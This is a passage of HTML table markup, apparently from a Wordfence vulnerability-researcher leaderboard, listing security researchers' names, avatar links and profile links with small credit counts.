<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9786d2004e23d165ca5600a93fa2c533.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9786d2004e23d165ca5600a93fa2c533"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nir-yehoshua" target="_blank" rel="noopener">Nir Yehoshua</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6c02c2a9a8f148c260a3f7b0e64cd4fd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6c02c2a9a8f148c260a3f7b0e64cd4fd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jiemook" target="_blank" rel="noopener">Jiemook</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8f2147d3a162aeba1f2416afc4c0274c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8f2147d3a162aeba1f2416afc4c0274c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abdullah-kareem" target="_blank" rel="noopener">Abdullah Kareem</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/efd10eb3421a6ca0a3d855ad7029a801.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="efd10eb3421a6ca0a3d855ad7029a801"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener">V1T</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5e0deed32e14b877a67ce3b9e0bf3b49.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e0deed32e14b877a67ce3b9e0bf3b49"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrew-gomez" target="_blank" rel="noopener">andrew gomez</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/218a9b01bda0481cfca44df3b61fa0a5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="218a9b01bda0481cfca44df3b61fa0a5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cem-bas" target="_blank" rel="noopener">Cem Bas</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/10dc2bd424adaa3236fb2e17dcdba9db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="10dc2bd424adaa3236fb2e17dcdba9db"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pedro-pinho" target="_blank" rel="noopener">Pedro Pinho</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7281b22ecfa0daa444618787ac0114ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7281b22ecfa0daa444618787ac0114ec"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoangphuong" target="_blank" rel="noopener">hoangphuong</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/af82254467db515fd38fdb85f781bd46.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="af82254467db515fd38fdb85f781bd46"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/benjamin-aguayo" target="_blank" rel="noopener">Benjamin Aguayo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/97a1f88460217867f45b925b3af1bb6a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="97a1f88460217867f45b925b3af1bb6a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yudha" target="_blank" rel="noopener">Muhammad Yudha &#8211; DJ</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/28bb5e57f2ebf46069c888bd33017ec4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="28bb5e57f2ebf46069c888bd33017ec4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aydan" target="_blank" rel="noopener">Aydan Arabadzha</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4a36854ce1b3d726839f26041f205bdd.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4a36854ce1b3d726839f26041f205bdd"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sequence-x0" target="_blank" rel="noopener">sequence_X0</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/509a0254bc50b96d0436a094a1160af3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="509a0254bc50b96d0436a094a1160af3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/molten-bit" target="_blank" rel="noopener">molten bit</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5ecfc9c03983d74db8c6ffd1ca94ca51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5ecfc9c03983d74db8c6ffd1ca94ca51"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truong-huu-phuc" target="_blank" rel="noopener">Trương Hữu Phúc</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c66fb0b7712651eb163ce36dbb3a214e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c66fb0b7712651eb163ce36dbb3a214e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lord-willmore" target="_blank" rel="noopener">lord willmore</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d59af63987c0d31071cf741206b4470d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d59af63987c0d31071cf741206b4470d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vivien-lebas" target="_blank" rel="noopener">Vivien LEBAS</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/69c5e2969d579d1351243832fa879b61.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="69c5e2969d579d1351243832fa879b61"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phat-rio" target="_blank" rel="noopener">Phat RiO</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0d11336c7d3499be8c645e73493a54cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0d11336c7d3499be8c645e73493a54cf"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thanh-lam-tang" target="_blank" rel="noopener">Thanh Lam Tang</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c50973081ac6e68d2a8344fbd0608368.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c50973081ac6e68d2a8344fbd0608368"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/haitam-lazaar" target="_blank" rel="noopener">Haitam Lazaar</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d21fb166407d8c0d8ecc877d8a409499.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d21fb166407d8c0d8ecc877d8a409499"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ionut-pipirig" target="_blank" rel="noopener">Ionut Pipirig</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6b8ada522225697cf6e18bf154ac5e7e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6b8ada522225697cf6e18bf154ac5e7e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hijun-kim" target="_blank" rel="noopener">Hijun Kim</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4418c9327e7455cc20ecc3238895e0d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4418c9327e7455cc20ecc3238895e0d9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trong-pham-dtro" target="_blank" rel="noopener">Trong Pham (dtro)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/686db785ef138a2df1f8279970662a2a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="686db785ef138a2df1f8279970662a2a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hao-ngo" target="_blank" rel="noopener">Hao Ngo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/62f9ef507ab6589c612d838996c4f1c6.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="62f9ef507ab6589c612d838996c4f1c6"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sanghyeok-kim" target="_blank" rel="noopener">sanghyeok Kim</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b14fa5f6450b0009896584807bc88c4c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b14fa5f6450b0009896584807bc88c4c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-mehedi-hasan" target="_blank" rel="noopener">Md Mehedi Hasan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f7a401ff0c9706d16cdb8dd3bdf72a6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f7a401ff0c9706d16cdb8dd3bdf72a6b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nasur-ullah-spy0x7" target="_blank" rel="noopener">Spy0x7</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cfc16ede98e1f9d9949c6a2b6b70bc1c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cfc16ede98e1f9d9949c6a2b6b70bc1c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dinh-van" target="_blank" rel="noopener">d.v4n_s3c</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/88cc8dc4d878286d42f6bc0bff1b9ea1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="88cc8dc4d878286d42f6bc0bff1b9ea1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jaan-buerms" target="_blank" rel="noopener">Jaan Buerms</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d6e0ce93ee91d99b092003f1ffc47ea5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d6e0ce93ee91d99b092003f1ffc47ea5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truoc-phan" target="_blank" rel="noopener">Truoc Phan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0f9145553cefadc810683299145a6e4b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f9145553cefadc810683299145a6e4b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/udin-chan" target="_blank" rel="noopener">Udin Chan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/72d885691c67a8179868e1305c6b6109.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="72d885691c67a8179868e1305c6b6109"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lee-chul-woong" target="_blank" rel="noopener">Lee chul woong</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/429c3eb56bea605e95a57ae93ae24c62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="429c3eb56bea605e95a57ae93ae24c62"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener">Nguyen Ba Khanh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/6850e6e9fde2fb4afa5c90fd6bb8b6c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6850e6e9fde2fb4afa5c90fd6bb8b6c9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mohammed-abd-alrahman" target="_blank" rel="noopener">Mohammed Abd Alrahman</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/960eb86bf3a5927188ecec51187f1ec1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="960eb86bf3a5927188ecec51187f1ec1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coryroo" target="_blank" rel="noopener">CoryRoo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/fc9c08d9df7f134cb77bb16f407f825a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fc9c08d9df7f134cb77bb16f407f825a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/louise" target="_blank" rel="noopener">Louise</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8518b5284cbd27f6cda0bbaa16c20469.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8518b5284cbd27f6cda0bbaa16c20469"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manuel-martinez-casasola" target="_blank" rel="noopener">Manuel Martínez Casasola</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/df341ae9424df0dae114c9dd0c62dcc2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="df341ae9424df0dae114c9dd0c62dcc2"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/todd-chaffins" target="_blank" rel="noopener">Slopothecary</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/57c4de370ed750b5cc57c14f35f00b40.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="57c4de370ed750b5cc57c14f35f00b40"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/marim00" target="_blank" rel="noopener">marim00</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/851380a0ae432961e3bc66b0b30bb576.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851380a0ae432961e3bc66b0b30bb576"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/emiliano-carrizo" target="_blank" rel="noopener">emiliano carrizo</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7fe5317595b8e4f4fe5505d7bb59d8cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7fe5317595b8e4f4fe5505d7bb59d8cc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez" target="_blank" rel="noopener">Pablo González</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b1aa5a0f2e6479b3ad0ee9bf73a43047.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b1aa5a0f2e6479b3ad0ee9bf73a43047"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/fran-ramirez" target="_blank" rel="noopener">Fran Ramírez</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cea66da98e20e80db2900b6b074ea702.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cea66da98e20e80db2900b6b074ea702"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vapour" target="_blank" rel="noopener">Vapour</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/73f53dafd32993ac7c0157a4e6729638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="73f53dafd32993ac7c0157a4e6729638"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bao-2" target="_blank" rel="noopener">Bao</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/36e9416dfbe25a51cc77fdbf14a7cc42.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="36e9416dfbe25a51cc77fdbf14a7cc42"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-phuoc-thinh" target="_blank" rel="noopener">Nguyen Phuoc Thinh</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/13e4fb57452a5afebd2ab91bf8a0bd52.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="13e4fb57452a5afebd2ab91bf8a0bd52"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-hassan-2" target="_blank" rel="noopener">Ahmed Hassan</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b596eef6275fcf70c058035885683275.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b596eef6275fcf70c058035885683275"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/m-indra-purnama-zzkiel" target="_blank" rel="noopener">type5afe</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/22d12b4c44e574b32a29d063142b8954.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="22d12b4c44e574b32a29d063142b8954"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener">Brian Willows</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/25a7aba6b0ca3cb44451acfaa9a181fc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="25a7aba6b0ca3cb44451acfaa9a181fc"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/doyz" target="_blank" rel="noopener">doyz</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/64cf1475dedd021651902db53af18364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="64cf1475dedd021651902db53af18364"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jonah-burgess" target="_blank" rel="noopener">Jonah Burgess (CryptoCat)</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a432bd51721d1298fe78607f1b39c071.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a432bd51721d1298fe78607f1b39c071"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/lanlv" target="_blank" rel="noopener">lanlv</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2cd055dd6c3bc3b1292e85a8a8a0cfd9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2cd055dd6c3bc3b1292e85a8a8a0cfd9"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/duy-khanh" target="_blank" rel="noopener">Duy Tran</a>
				</div>
</p></div>
</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
